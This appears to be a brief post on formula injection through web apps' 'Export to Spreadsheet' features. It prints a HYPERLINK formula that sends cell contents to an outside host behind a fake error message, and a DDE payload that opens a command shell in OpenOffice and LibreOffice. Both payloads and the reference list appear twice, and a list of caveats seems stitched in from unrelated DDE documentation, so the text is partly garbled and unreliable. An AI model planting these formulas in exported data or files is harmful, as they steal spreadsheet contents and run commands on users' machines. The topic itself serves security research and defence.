Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality
This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")
=cmd|' /C cmd'!A0
Reference
https://wiki.openoffice.org/wiki/Documentation/How_Tos/Calc:_DDE_function
http://contextis.co.uk/blog/comma-separated-vulnerabilities/
=HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")
=cmd|' /C cmd'!A0
Possible Issues for which the attack might not work:
- Excel does not have this function.
- When using an array to return data, the size of the array is fixed on first calculation. If for example the number of lines in a Writer table or section changes, the array size in Calc does not change.
- On the majority of platforms, accented characters are treated wrong.
- There are alternative ways to link to external data.
Reference
https://wiki.openoffice.org/wiki/Documentation/How_Tos/Calc:_DDE_function
http://contextis.co.uk/blog/comma-separated-vulnerabilities/